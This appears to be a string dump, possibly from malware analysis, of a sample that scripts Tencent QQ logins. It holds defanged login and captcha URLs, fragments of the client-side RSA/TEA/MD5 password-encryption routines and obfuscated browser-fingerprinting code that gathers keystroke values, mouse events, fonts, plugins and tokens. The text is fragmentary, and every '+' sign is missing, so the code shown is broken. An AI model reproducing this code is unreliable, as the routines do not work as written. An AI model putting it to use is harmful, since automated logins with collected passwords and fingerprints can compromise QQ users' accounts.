&fpinfo=fpsig=10003984BBD51C3B52FD927E254E90E605658E8D6BF1CC645111B23EAF66D6F2F09DD5EEB20495B6A3053095B909E270B0A2&tlg=1&vlg=0_0_0&vmtime=_&vmData=

&websig=

aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

Referer: hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

&js_ver=10216&js_type=1&login_sig=

&pt_randsalt=2&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=1-

hXXps://ssl.ptlogin2.qq.com/login?u=

aq.qq.com/cn2/unionverify/

if (ans == w.toLowerCase()) {

for (j = 0; j <= 3; j  ) str  = hex_chr.charAt((num >> (j * 8   4)) & 0x0F)   hex_chr.charAt((num >> (j * 8)) & 0x0F);

nblk = ((str.length   8) >> 6)   1;

for (i = 0; i < str.length; i  ) blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);

blks[nblk * 16 - 2] = str.length * 8;

for (i = 0; i < x.length; i  = 16) {

$.RSA = $pt.RSA = function() {

if (e < t.length   11) return uv_alert("Message too long for RSA"),

n = t.length - 1; n >= 0 && e > 0;) {

var o = t.charCodeAt(n--);

for (s[0] = 0; 0 == s[0];) p.nextBytes(s);

this.dmp1 = null,

this.dmq1 = null,

this.coeff = null

null != e && null != i && e.length > 0 && i.length > 0 ? (this.n = t(e, 16), this.e = parseInt(i, 16)) : uv_alert("Invalid RSA public key")

return t.modPowInt(this.e, this.n)

var i = e(t, this.n.bitLength()   7 >> 3);

var n = this.doPublic(i);

var o = n.toString(16);

return 0 == (1 & o.length) ? o: "0"   o

null != t && ("number" == typeof t ? this.fromNumber(t, e, i) : null == e && "string" != typeof t ? this.fromString(t, 256) : this.fromString(t, e))

o = Math.floor(r / 67108864),

return ut.charAt(t)

var i = gt[t.charCodeAt(e)];

return e.fromInt(t),

if (4 != e) return void this.fromRadix(t, e);

for (var n = t.length,

0 > s ? "-" == t.charAt(n) && (o = !0) : (o = !1, 0 == p ? this[this.t  ] = s: p   i > this.DB ? (this[this.t - 1] |= (s & (1 << this.DB - p) - 1) << p, this[this.t  ] = s >> this.DB - p) : this[this.t - 1] |= s << p, p  = i, p >= this.DB && (p -= this.DB))

8 == i && 0 != (128 & t[0]) && (this.s = -1, p > 0 && (this[this.t - 1] |= (1 << this.DB - p) - 1 << p)),

this.clamp(),

o && r.ZERO.subTo(this, this)

for (var t = this.s & this.DM; this.t > 0 && this[this.t - 1] == t;)--this.t

if (this.s < 0) return "-"   this.negate().toString(t);

if (4 != t) return this.toRadix(t);

s = this.DB - r * this.DB % e;

if (r-->0) for (s < this.DB && (i = this[r] >> s) > 0 && (o = !0, p = u(i)); r >= 0;) e > s ? (i = (this[r] & (1 << s) - 1) << e - s, i |= this[--r] >> (s  = this.DB - e)) : (i = this[r] >> (s -= e) & n, 0 >= s && (s  = this.DB, --r)),

return r.ZERO.subTo(this, t),

return this.s < 0 ? this.negate() : this

return this.t <= 0 ? 0 : this.DB * (this.t - 1)   b(this[this.t - 1] ^ this.s & this.DM)

e.t = Math.max(this.t - t, 0),

var i, n = t % this.DB,

o = this.DB - n,

r = Math.floor(t / this.DB),

s = this.s << n & this.DM;

e.clamp()

var i = Math.floor(t / this.DB);

var n = t % this.DB,

o = Math.min(t.t, this.t); o > i;) n  = this[i] - t[i],

e[i  ] = n & this.DM,

n >>= this.DB;

e[i  ] = n & this.DM,

n >>= this.DB;

-1 > n ? e[i  ] = this.DV   n: n > 0 && (e[i  ] = n),

var i = this.abs(),

n = t.abs(),

for (o = 0; o < n.t;   o) e[o   i.t] = i.am(0, n[o], e, o, 0, i.t);

e.clamp(),

this.s != t.s && r.ZERO.subTo(e, e)

for (var e = this.abs(), i = t.t = 2 * e.t; --i >= 0;) t[i] = 0;

var n = e.am(i, e[i], t, 2 * i, 0, 1); (t[i   e.t]  = e.am(i   1, 2 * e[i], t, 2 * i   1, n, e.t - i - 1)) >= e.DV && (t[i   e.t] -= e.DV, t[i   e.t   1] = 1)

t.t > 0 && (t[t.t - 1]  = e.am(i, e[i], t, 2 * i, 0, 1)),

t.clamp()

var n = t.abs();

var o = this.abs();

if (o.t < n.t) return null != e && e.fromInt(0),

void(null != i && this.copyTo(i));

c = this.DB - b(n[n.t - 1]);

c > 0 ? (n.lShiftTo(c, p), o.lShiftTo(c, i)) : (n.copyTo(p), o.copyTo(i));

h = this.FV / d,

for (p.dlShiftTo($, v), i.compareTo(v) >= 0 && (i[i.t  ] = 1, i.subTo(v, i)), r.ONE.dlShiftTo(u, v), v.subTo(p, p); p.t < u;) p[p.t  ] = 0;

var w = i[--_] == g ? this.DM: Math.floor(i[_] * h   (i[_ - 1]   m) * f);

if ((i[_]  = p.am(0, w, i, $, 0, u)) < w) for (p.dlShiftTo($, v), i.subTo(v, i); i[_] < --w;) i.subTo(v, i)

null != e && (i.drShiftTo(u, e), a != l && r.ZERO.subTo(e, e)),

i.clamp(),

c > 0 && i.rShiftTo(c, i),

0 > a && r.ZERO.subTo(i, i)

return this.abs().divRemTo(t, null, e),

this.s < 0 && e.compareTo(r.ZERO) > 0 && t.subTo(e, e),

return t.s < 0 || t.compareTo(this.m) >= 0 ? t.mod(this.m) : t

t.divRemTo(this.m, null, t)

t.multiplyTo(e, i),

this.reduce(i)

t.squareTo(e),

this.reduce(e)

e = e * (2 - t * e % this.DV) % this.DV,

e > 0 ? this.DV - e: -e

this.mp = t.invDigit(),

this.mpl = 32767 & this.mp,

this.mph = this.mp >> 15,

this.um = (1 << t.DB - 15) - 1,

this.mt2 = 2 * t.t

return t.abs().dlShiftTo(this.m.t, e),

e.divRemTo(this.m, null, e),

t.s < 0 && e.compareTo(r.ZERO) > 0 && this.m.subTo(e, e),

return t.copyTo(e),

this.reduce(e),

for (; t.t <= this.mt2;) t[t.t  ] = 0;

n = i * this.mpl   ((i * this.mph   (t[e] >> 15) * this.mpl & this.um) << 15) & t.DM;

for (i = e   this.m.t, t[i]  = this.m.am(0, n, t, e, 0, this.m.t); t[i] >= t.DV;) t[i] -= t.DV,

t.clamp(),

t.drShiftTo(this.m.t, t),

t.compareTo(this.m) >= 0 && t.subTo(this.m, t)

if (t > 4294967295 || 1 > t) return r.ONE;

o = e.convert(this),

for (o.copyTo(i); --p >= 0;) if (e.sqrTo(i, n), (t & 1 << p) > 0) e.mulTo(n, o, i);

return e.revert(i)

return i = 256 > t || e.isEven() ? new P(e) : new B(e),

this.exp(t, i)

X((new Date).getTime())

for (Z(), dt = nt(), dt.init(ht), ft = 0; ft < ht.length;   ft) ht[ft] = 0;

return dt.next()

for (e = 0; e < t.length;   e) t[e] = K()

for (i = 0, e = 0; 256 > e;   e) i = i   this.S[e]   t[e % t.length] & 255,

return o.setPublic(e, n),

o.encrypt(t)

i.prototype.doPublic = o,

i.prototype.setPublic = n,

i.prototype.encrypt = p;

st && "Microsoft Internet Explorer" == navigator.appName ? (r.prototype.am = l, pt = 30) : st && "Netscape" != navigator.appName ? (r.prototype.am = a, pt = 26) : (r.prototype.am = c, pt = 28),

r.prototype.DB = pt,

r.prototype.DM = (1 << pt) - 1,

r.prototype.DV = 1 << pt;

r.prototype.FV = Math.pow(2, at),

r.prototype.F1 = at - pt,

r.prototype.F2 = 2 * pt - at;

for (lt = "0".charCodeAt(0), ct = 0; 9 >= ct;   ct) gt[lt  ] = ct;

for (lt = "a".charCodeAt(0), ct = 10; 36 > ct;   ct) gt[lt  ] = ct;

for (lt = "A".charCodeAt(0), ct = 10; 36 > ct;   ct) gt[lt  ] = ct;

P.prototype.convert = Q,

P.prototype.revert = I,

P.prototype.reduce = H,

P.prototype.mulTo = M,

P.prototype.sqrTo = V,

B.prototype.convert = U,

B.prototype.revert = O,

B.prototype.reduce = j,

B.prototype.mulTo = F,

B.prototype.sqrTo = R,

r.prototype.copyTo = d,

r.prototype.fromInt = h,

r.prototype.fromString = m,

r.prototype.clamp = _,

r.prototype.dlShiftTo = S,

r.prototype.drShiftTo = q,

r.prototype.lShiftTo = C,

r.prototype.rShiftTo = T,

r.prototype.subTo = x,

r.prototype.multiplyTo = A,

r.prototype.squareTo = N,

r.prototype.divRemTo = E,

r.prototype.invDigit = D,

r.prototype.isEven = z,

r.prototype.exp = G,

r.prototype.toString = $,

r.prototype.negate = v,

r.prototype.abs = w,

r.prototype.compareTo = y,

r.prototype.bitLength = k,

r.prototype.mod = L,

r.prototype.modPowInt = W,

r.ZERO = f(0),

r.ONE = f(1);

if ("Netscape" == navigator.appName && navigator.appVersion < "5" && window.crypto && window.crypto.random) {

var _t = window.crypto.random(32);

for (mt = 0; mt < _t.length;   mt) ht[ft  ] = 255 & _t.charCodeAt(mt)

for (; $t > ft;) mt = Math.floor(65536 * Math.random()),

Y.prototype.nextBytes = J,

tt.prototype.init = et,

tt.prototype.next = it;

return Math.round(4294967295 * Math.random())

i = 0; i < t.length; i  ) {

var n = Number(t[i]).toString(16);

1 == n.length && (n = "0"   n),

i = 0; i < t.length; i  = 2) e  = String.fromCharCode(parseInt(t.substr(i, 2), 16));

for (var i = [], n = 0; n < t.length; n  ) i[n] = t.charCodeAt(n);

o = t.length;

for (e = 0; o > e; e  ) i = t.charCodeAt(e),

i > 0 && 127 >= i ? n.push(t.charAt(e)) : i >= 128 && 2047 >= i ? n.push(String.fromCharCode(192 | i >> 6 & 31), String.fromCharCode(128 | 63 & i)) : i >= 2048 && 65535 >= i && n.push(String.fromCharCode(224 | i >> 12 & 15), String.fromCharCode(128 | i >> 6 & 63), String.fromCharCode(128 | 63 & i));

return n.join("")

var i = t.length,

n = t.length;

for (var o = 0; o < i.length; o  ) i[o] = 0;

for (var t = (b.length, 0); 8 > t; t  ) $[t] ^= b[v   t];

if (e) for (var n = 0; n < t.length; n  ) i[n] = 255 & t.charCodeAt(n);

n = 0; n < t.length; n  = 2) i[o  ] = parseInt(t.substr(n, 2), 16);

t.TEA = {

for (var i = h(t, e), n = a(i), o = "", p = 0; p < n.length; p  ) o  = String.fromCharCode(n[p]);

initkey: function(t, e) {

S.PADCHAR = "=",

S.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /",

S.getbyte = function(t, e) {

var i = t.charCodeAt(e);

S.encode = function(t) {

if (1 != arguments.length) throw "SyntaxError: Not enough arguments";

var e, i, n = S.PADCHAR,

o = S.ALPHA,

p = S.getbyte,

var s = t.length - t.length % 3;

if (0 == t.length) return t;

r.push(o.charAt(i >> 18)),

r.push(o.charAt(i >> 12 & 63)),

r.push(o.charAt(i >> 6 & 63)),

r.push(o.charAt(63 & i));

switch (t.length - s) {

r.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   n   n);

r.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   o.charAt(i >> 6 & 63)   n)

return r.join("")

window.btoa || (window.btoa = S.encode)

return binl2hex(core_md5(str2binl(t), t.length * chrsz))

return binl2str(core_md5(str2binl(t), t.length * chrsz))

r = 0; r < t.length; r  = 16) {

i.length > 16 && (i = core_md5(i, t.length * chrsz));

var r = core_md5(n.concat(str2binl(e)), 512   e.length * chrsz);

return core_md5(o.concat(r), 640)

for (var e = Array(), i = (1 << chrsz) - 1, n = 0; n < t.length * chrsz; n  = chrsz) e[n >> 5] |= (t.charCodeAt(n / chrsz) & i) << n % 32;

i = (1 << chrsz) - 1, n = 0; n < 32 * t.length; n  = chrsz) e  = String.fromCharCode(t[n >> 5] >>> n % 32 & i);

for (var e = hexcase ? "0123456789ABCDEF": "0123456789abcdef", i = "", n = 0; n < 4 * t.length; n  ) i  = e.charAt(t[n >> 2] >> n % 4 * 8   4 & 15)   e.charAt(t[n >> 2] >> n % 4 * 8 & 15);

n = 0; n < 4 * t.length; n  = 3) for (var o = (t[n >> 2] >> 8 * (n % 4) & 255) << 16 | (t[n   1 >> 2] >> 8 * ((n   1) % 4) & 255) << 8 | t[n   2 >> 2] >> 8 * ((n   2) % 4) & 255, p = 0; 4 > p; p  ) i  = 8 * n   6 * p > 32 * t.length ? b64pad: e.charAt(o >> 6 * (3 - p) & 63);

for (var arr = [], i = 0; i < str.length; i  = 2) arr.push("\\x"   str.substr(i, 2));

return arr = arr.join(""),

if (! (Math.random() > (e || 1))) try {

var i = location.protocol   "//ui.ptlogin2.qq.com/cgi-bin/report?id="   t,

n = document.createElement("img");

n.src = i

TEA = window.TEA,

for (var o = n ? t: md5(t), p = hexchar2bin(o), r = md5(p   e), s = TEA.strToBytes(i.toUpperCase(), !0), a = Number(s.length / 2).toString(16); a.length < 4;) a = "0"   a;

TEA.initkey(r);

var l = TEA.encrypt(o   TEA.strToBytes(e)   a   s);

TEA.initkey("");

for (var c = Number(l.length / 2).toString(16); c.length < 4;) c = "0"   c;

var u = $pt.RSA.rsa_encrypt(hexchar2bin(c   l));

return window.btoa(hexchar2bin(u)).replace(/[\/\ =]/g,

"/": "-",

" ": "*",

"=": "_"

for (var hex = str.toString(16), len = hex.length, i = len; maxLength > i; i  ) hex = "0"   hex;

for (var arr = [], j = 0; maxLength > j; j  = 2) arr.push("\\x"   hex.substr(j, 2));

var result = arr.join("");

o = n   e.toUpperCase(),

p = $.RSA.rsa_encrypt(o);

return Math.round(4294967295*Math.random())

i=0;i<t.length;i  ){

var n=Number(t[i]).toString(16);

1==n.length&&(n="0" n),

i=0;i<t.length;i =2)e =String.fromCharCode(parseInt(t.substr(i,2),16));

for(var i=[],n=0;n<t.length;n  )i[n]=t.charCodeAt(n);

o=t.length;

for(e=0;o>e;e  )i=t.charCodeAt(e),

i>0&&127>=i?n.push(t.charAt(e)):i>=128&&2047>=i?n.push(String.fromCharCode(192|i>>6&31),String.fromCharCode(128|63&i)):i>=2048&&65535>=i&&n.push(String.fromCharCode(224|i>>12&15),String.fromCharCode(128|i>>6&63),String.fromCharCode(128|63&i));

return n.join("")

var i=t.length,

n=t.length;

for(var o=0;o<i.length;o  )i[o]=0;

for(var t=(k.length,0);8>t;t  )$[t]^=k[v t];

if(e)for(var n=0;n<t.length;n  )i[n]=255&t.charCodeAt(n);

n=0;n<t.length;n =2)i[o  ]=parseInt(t.substr(n,2),16);

t.TEA={

for(var i=h(t,e),n=a(i),o="",p=0;p<n.length;p  )o =String.fromCharCode(n[p]);

initkey:function(t,e){

q.PADCHAR="=",

q.ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /",

q.getbyte=function(t,e){

var i=t.charCodeAt(e);

q.encode=function(t){

if(1!=arguments.length)throw"SyntaxError: Not enough arguments";

var e,i,n=q.PADCHAR,

o=q.ALPHA,

p=q.getbyte,

var s=t.length-t.length%3;

if(0==t.length)return t;

r.push(o.charAt(i>>18)),

r.push(o.charAt(i>>12&63)),

r.push(o.charAt(i>>6&63)),

r.push(o.charAt(63&i));

switch(t.length-s){

r.push(o.charAt(i>>18) o.charAt(i>>12&63) n n);

r.push(o.charAt(i>>18) o.charAt(i>>12&63) o.charAt(i>>6&63) n)

return r.join("")

window.btoa||(window.btoa=q.encode)

$.RSA=$pt.RSA=function(){

if(e<t.length 11)return uv_alert("Message too long for RSA"),

n=t.length-1;n>=0&&e>0;){

var o=t.charCodeAt(n--);

for(s[0]=0;0==s[0];)p.nextBytes(s);

this.dmp1=null,

this.dmq1=null,

this.coeff=null

null!=e&&null!=i&&e.length>0&&i.length>0?(this.n=t(e,16),this.e=parseInt(i,16)):uv_alert("Invalid RSA public key")

return t.modPowInt(this.e,this.n)

var i=e(t,this.n.bitLength() 7>>3);

var n=this.doPublic(i);

var o=n.toString(16);

return 0==(1&o.length)?o:"0" o

null!=t&&("number"==typeof t?this.fromNumber(t,e,i):null==e&&"string"!=typeof t?this.fromString(t,256):this.fromString(t,e))

o=Math.floor(r/67108864),

return ut.charAt(t)

var i=gt[t.charCodeAt(e)];

return e.fromInt(t),

if(4!=e)return void this.fromRadix(t,e);

for(var n=t.length,

0>s?"-"==t.charAt(n)&&(o=!0):(o=!1,0==p?this[this.t  ]=s:p i>this.DB?(this[this.t-1]|=(s&(1<<this.DB-p)-1)<<p,this[this.t  ]=s>>this.DB-p):this[this.t-1]|=s<<p,p =i,p>=this.DB&&(p-=this.DB))

8==i&&0!=(128&t[0])&&(this.s=-1,p>0&&(this[this.t-1]|=(1<<this.DB-p)-1<<p)),

this.clamp(),

o&&r.ZERO.subTo(this,this)

for(var t=this.s&this.DM;this.t>0&&this[this.t-1]==t;)--this.t

if(this.s<0)return"-" this.negate().toString(t);

if(4!=t)return this.toRadix(t);

s=this.DB-r*this.DB%e;

if(r-->0)for(s<this.DB&&(i=this[r]>>s)>0&&(o=!0,p=u(i));r>=0;)e>s?(i=(this[r]&(1<<s)-1)<<e-s,i|=this[--r]>>(s =this.DB-e)):(i=this[r]>>(s-=e)&n,0>=s&&(s =this.DB,--r)),

return r.ZERO.subTo(this,t),

return this.s<0?this.negate():this

return this.t<=0?0:this.DB*(this.t-1) k(this[this.t-1]^this.s&this.DM)

e.t=Math.max(this.t-t,0),

var i,n=t%this.DB,

o=this.DB-n,

r=Math.floor(t/this.DB),

s=this.s<<n&this.DM;

e.clamp()

var i=Math.floor(t/this.DB);

var n=t%this.DB,

o=Math.min(t.t,this.t);o>i;)n =this[i]-t[i],

e[i  ]=n&this.DM,

n>>=this.DB;

-1>n?e[i  ]=this.DV n:n>0&&(e[i  ]=n),

var i=this.abs(),

n=t.abs(),

for(o=0;o<n.t;  o)e[o i.t]=i.am(0,n[o],e,o,0,i.t);

e.clamp(),

this.s!=t.s&&r.ZERO.subTo(e,e)

for(var e=this.abs(),i=t.t=2*e.t;--i>=0;)t[i]=0;

var n=e.am(i,e[i],t,2*i,0,1);(t[i e.t] =e.am(i 1,2*e[i],t,2*i 1,n,e.t-i-1))>=e.DV&&(t[i e.t]-=e.DV,t[i e.t 1]=1)

t.t>0&&(t[t.t-1] =e.am(i,e[i],t,2*i,0,1)),

t.clamp()

var n=t.abs();

var o=this.abs();

if(o.t<n.t)return null!=e&&e.fromInt(0),

void(null!=i&&this.copyTo(i));

c=this.DB-k(n[n.t-1]);

c>0?(n.lShiftTo(c,p),o.lShiftTo(c,i)):(n.copyTo(p),o.copyTo(i));

h=this.FV/d,

for(p.dlShiftTo($,v),i.compareTo(v)>=0&&(i[i.t  ]=1,i.subTo(v,i)),r.ONE.dlShiftTo(u,v),v.subTo(p,p);p.t<u;)p[p.t  ]=0;

var y=i[--_]==g?this.DM:Math.floor(i[_]*h (i[_-1] m)*f);

if((i[_] =p.am(0,y,i,$,0,u))<y)for(p.dlShiftTo($,v),i.subTo(v,i);i[_]<--y;)i.subTo(v,i)

null!=e&&(i.drShiftTo(u,e),a!=l&&r.ZERO.subTo(e,e)),

i.clamp(),

c>0&&i.rShiftTo(c,i),

0>a&&r.ZERO.subTo(i,i)

return this.abs().divRemTo(t,null,e),

this.s<0&&e.compareTo(r.ZERO)>0&&t.subTo(e,e),

return t.s<0||t.compareTo(this.m)>=0?t.mod(this.m):t

t.divRemTo(this.m,null,t)

t.multiplyTo(e,i),

this.reduce(i)

t.squareTo(e),

this.reduce(e)

e=e*(2-t*e%this.DV)%this.DV,

e>0?this.DV-e:-e

this.mp=t.invDigit(),

this.mpl=32767&this.mp,

this.mph=this.mp>>15,

this.um=(1<<t.DB-15)-1,

this.mt2=2*t.t

return t.abs().dlShiftTo(this.m.t,e),

e.divRemTo(this.m,null,e),

t.s<0&&e.compareTo(r.ZERO)>0&&this.m.subTo(e,e),

return t.copyTo(e),

this.reduce(e),

for(;t.t<=this.mt2;)t[t.t  ]=0;

n=i*this.mpl ((i*this.mph (t[e]>>15)*this.mpl&this.um)<<15)&t.DM;

for(i=e this.m.t,t[i] =this.m.am(0,n,t,e,0,this.m.t);t[i]>=t.DV;)t[i]-=t.DV,

t.clamp(),

t.drShiftTo(this.m.t,t),

t.compareTo(this.m)>=0&&t.subTo(this.m,t)

if(t>4294967295||1>t)return r.ONE;

o=e.convert(this),

for(o.copyTo(i);--p>=0;)if(e.sqrTo(i,n),(t&1<<p)>0)e.mulTo(n,o,i);

return e.revert(i)

return i=256>t||e.isEven()?new A(e):new B(e),

this.exp(t,i)

X((new Date).getTime())

for(Z(),dt=nt(),dt.init(ht),ft=0;ft<ht.length;  ft)ht[ft]=0;

return dt.next()

for(e=0;e<t.length;  e)t[e]=K()

for(i=0,e=0;256>e;  e)i=i this.S[e] t[e%t.length]&255,

return o.setPublic(e,n),

o.encrypt(t)

i.prototype.doPublic=o,

i.prototype.setPublic=n,

i.prototype.encrypt=p;

st&&"Microsoft Internet Explorer"==navigator.appName?(r.prototype.am=l,pt=30):st&&"Netscape"!=navigator.appName?(r.prototype.am=a,pt=26):(r.prototype.am=c,pt=28),

r.prototype.DB=pt,

r.prototype.DM=(1<<pt)-1,

r.prototype.DV=1<<pt;

r.prototype.FV=Math.pow(2,at),

r.prototype.F1=at-pt,

r.prototype.F2=2*pt-at;

for(lt="0".charCodeAt(0),ct=0;9>=ct;  ct)gt[lt  ]=ct;

for(lt="a".charCodeAt(0),ct=10;36>ct;  ct)gt[lt  ]=ct;

for(lt="A".charCodeAt(0),ct=10;36>ct;  ct)gt[lt  ]=ct;

A.prototype.convert=I,

A.prototype.revert=Q,

A.prototype.reduce=M,

A.prototype.mulTo=D,

A.prototype.sqrTo=H,

B.prototype.convert=O,

B.prototype.revert=j,

B.prototype.reduce=V,

B.prototype.mulTo=F,

B.prototype.sqrTo=R,

r.prototype.copyTo=d,

r.prototype.fromInt=h,

r.prototype.fromString=m,

r.prototype.clamp=_,

r.prototype.dlShiftTo=q,

r.prototype.drShiftTo=S,

r.prototype.lShiftTo=C,

r.prototype.rShiftTo=T,

r.prototype.subTo=x,

r.prototype.multiplyTo=L,

r.prototype.squareTo=N,

r.prototype.divRemTo=E,

r.prototype.invDigit=U,

r.prototype.isEven=G,

r.prototype.exp=z,

r.prototype.toString=$,

r.prototype.negate=v,

r.prototype.abs=y,

r.prototype.compareTo=w,

r.prototype.bitLength=b,

r.prototype.mod=P,

r.prototype.modPowInt=W,

r.ZERO=f(0),

r.ONE=f(1);

if("Netscape"==navigator.appName&&navigator.appVersion<"5"&&window.crypto&&window.crypto.random){

var _t=window.crypto.random(32);

for(mt=0;mt<_t.length;  mt)ht[ft  ]=255&_t.charCodeAt(mt)

for(;$t>ft;)mt=Math.floor(65536*Math.random()),

Y.prototype.nextBytes=J,

tt.prototype.init=et,

tt.prototype.next=it;

$.Encryption=$pt.Encryption=function(){

return u(i(c(t),t.length*_))

u=0;u<t.length;u =16){

for(var e=Array(),i=(1<<_)-1,n=0;n<t.length*_;n =_)e[n>>5]|=(t.charCodeAt(n/_)&i)<<n2;

for(var e=m?"0123456789ABCDEF":"0123456789abcdef",i="",n=0;n<4*t.length;n  )i =e.charAt(t[n>>2]>>n%4*8 4&15) e.charAt(t[n>>2]>>n%4*8&15);

for(var e=[],i=0;i<t.length;i =2)e.push(String.fromCharCode(parseInt(t.substr(i,2),16)));

return e.join("")

if(!(Math.random()>(e||1)))try{

var i=location.protocol "//ui.ptlogin2.qq.com/cgi-bin/report?id=" t,

n=document.createElement("img");

n.src=i

for(var p=o?e:t(e),r=g(p),s=t(r i),a=TEA.strToBytes(n.toUpperCase(),!0),l=Number(a.length/2).toString(16);l.length<4;)l="0" l;

TEA.initkey(s);

var c=TEA.encrypt(p TEA.strToBytes(i) l a);

TEA.initkey("");

for(var u=Number(c.length/2).toString(16);u.length<4;)u="0" u;

var h=$pt.RSA.rsa_encrypt(g(u c));

return window.btoa(g(h)).replace(/[\/\ =]/g,

"/":"-",

" ":"*",

p=o i.toUpperCase(),

r=$.RSA.rsa_encrypt(p);

var p=$.Encryption.getEncryption(pwd,uid,code);

hXXps://ssl.captcha.qq.com/cap_union_new_getsig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

{557CF400-1A04-11D3-9A73-0000F81EF32E}

{557CF401-1A04-11D3-9A73-0000F81EF32E}

{557CF402-1A04-11D3-9A73-0000F81EF32E}

{557CF405-1A04-11D3-9A73-0000F81EF32E}

.tiff

{557CF406-1A04-11D3-9A73-0000F81EF32E}

_0xf21cxa["keyvalue"] = [];

var _0xf21cx15 = ["mousemove", "mouseclick", "keyvalue", "user_Agent", "resolutionx", "resolutiony", "url", "refer", "begintime", "endtime", "platform", "os", "keyboards", "flash", "pluginNum", "index", "ptcz", "tokenid"];

_0xf21cx19["cutUrl"] = _0xf21cx45;

_0xf21cx4c["push"]((_0xf21cx5e >>> 4).toString(16));

_0xf21cx4c["push"]((_0xf21cx5e & 15).toString(16))

return _0xf21cx4c["join"]("")

return _0xf21cx53["join"]("")

_0xf21cx54["HmacMD5"] = _0xf21cx57._createHmacHelper(_0xf21cx55)

keySize: 4,

for (var _0xf21cx40 = this["cfg"], _0xf21cx43 = _0xf21cx40["hasher"]["create"](), _0xf21cx58 = _0xf21cx31["create"](), _0xf21cx52 = _0xf21cx58["words"], _0xf21cx5a = _0xf21cx40["keySize"], _0xf21cx40 = _0xf21cx40["iterations"]; _0xf21cx52["length"] < _0xf21cx5a;) {

this["_key"] = _0xf21cx5b;

keySize: 4,

return (_0xf21cx5b ? _0xf21cx43["create"]([1398893684, 1701076831])["concat"](_0xf21cx5b)["concat"](_0xf21cx58) : _0xf21cx58).toString(_0xf21cx55)

key: _0xf21cx5c,

keySize: _0xf21cx58   _0xf21cx5c

key: _0xf21cx5b,

_0xf21cx5c = _0xf21cx53["PasswordBasedCipher"] = _0xf21cx5b["extend"]({

_0xf21cx53 = _0xf21cx31["kdf"]["execute"](_0xf21cx53, _0xf21cx58["keySize"], _0xf21cx58["ivSize"]);

_0xf21cx58 = _0xf21cx5b["encrypt"]["call"](this, _0xf21cx58, _0xf21cx5c, _0xf21cx53["key"], _0xf21cx31);

_0xf21cx53 = _0xf21cx31["kdf"]["execute"](_0xf21cx53, _0xf21cx58["keySize"], _0xf21cx58["ivSize"], _0xf21cx5c["salt"]);

return _0xf21cx5b["decrypt"]["call"](this, _0xf21cx58, _0xf21cx5c, _0xf21cx53["key"], _0xf21cx31)

for (var _0xf21cx5b = this["_key"], _0xf21cx5c = _0xf21cx5b["words"], _0xf21cx53 = _0xf21cx5b["sigBytes"] / 4, _0xf21cx5b = 4 * ((this["_nRounds"] = _0xf21cx53   6)   1), _0xf21cx4c = this["_keySchedule"] = [], _0xf21cx5d = 0; _0xf21cx5d < _0xf21cx5b; _0xf21cx5d  ) {

_0xf21cx5c = this["_invKeySchedule"] = [];

this._doCryptBlock(_0xf21cx5b, _0xf21cx58, this._keySchedule, _0xf21cx54, _0xf21cx55, _0xf21cx56, _0xf21cx57, _0xf21cx31)

this._doCryptBlock(_0xf21cx5b, _0xf21cx5c, this._invKeySchedule, _0xf21cx58, _0xf21cx59, _0xf21cx5a, _0xf21cx5f, _0xf21cx43);

keySize: 8

return this.valueOf()

return isFinite(this.valueOf()) ? this["getUTCFullYear"]()   "-"   _0xf21cx66(this["getUTCMonth"]()   1)   "-"   _0xf21cx66(this["getUTCDate"]())   "T"   _0xf21cx66(this["getUTCHours"]())   ":"   _0xf21cx66(this["getUTCMinutes"]())   ":"   _0xf21cx66(this["getUTCSeconds"]())   "Z": null

return typeof _0xf21cx5c === "string" ? _0xf21cx5c: "\\u"   ("0000"   _0xf21cx5b["charCodeAt"](0).toString(16))["slice"]( - 4)

_0xf21cx57 = _0xf21cx7e["length"] === 0 ? "[]": _0xf21cx75 ? "["   _0xf21cx75   _0xf21cx7e["join"](","   _0xf21cx75)   ""   _0xf21cx7d   "]": "["   _0xf21cx7e["join"](",")   "]";

_0xf21cx57 = _0xf21cx7e["length"] === 0 ? "{}": _0xf21cx75 ? "{"   _0xf21cx75   _0xf21cx7e["join"](","   _0xf21cx75)   ""   _0xf21cx7d   "}": "{"   _0xf21cx7e["join"](",")   "}";

throw new Error("JSON.stringify")

return "\\u"   ("0000"   _0xf21cx5b["charCodeAt"](0).toString(16))["slice"]( - 4)

throw new SyntaxError("JSON.parse")

_0xf21cxb7["push"]("["   _0xf21cx5b   "] "   _0xf21cxb9(_0xf21cx58["message"] && (_0xf21cx58["name"] || "Error")   ": "   _0xf21cx58["message"] || _0xf21cx58.toString()))

var _0xf21cxbe = "Symbol;Arial;Courier New;Times New Roman;Georgia;Trebuchet MS;Verdana;Impact;Comic Sans MS;Webdings;Tahoma;Microsoft Sans Serif;Wingdings;Arial Black;Lucida Console;Marlett;Lucida Sans Unicode;Courier;Franklin Gothic Medium;Palatino Linotype" ["split"](";");

this)["join"](";")

var _0xf21cxc3 = ["ShockwaveFlash.ShockwaveFlash", "AcroPDF.PDF", "PDF.PdfCtrl", "QuickTime.QuickTime", "rmocx.RealPlayer G2 Control", "rmocx.RealPlayer G2 Control.1", "RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)", "RealVideo.RealVideo(tm) ActiveX Control (32-bit)", "RealPlayer", "SWCtl.SWCtl", "WMPlayer.OCX", "AgControl.AgControl", "Skype.Detection"];

})["join"](";")

_0xf21cxc6 = _0xf21cxc2 ? _0xf21cxc2["Shockwave Flash"]["description"] : new ActiveXObject("ShockwaveFlash.ShockwaveFlash").GetVariable("$version")["replace"](",", ".")

return !! window["indexedDB"]

_0xf21cx5c["bSupportLocalStorage"] = _0xf21cxc9;

_0xf21cx5c["reportError"] = _0xf21cxb8;

_0xf21cxb6["reportError"]("cIPT", e)

_0xf21cx100["src"] = "hXXps://bsp.qcloud.qq.com/v2/index.php"   _0xf21cx46

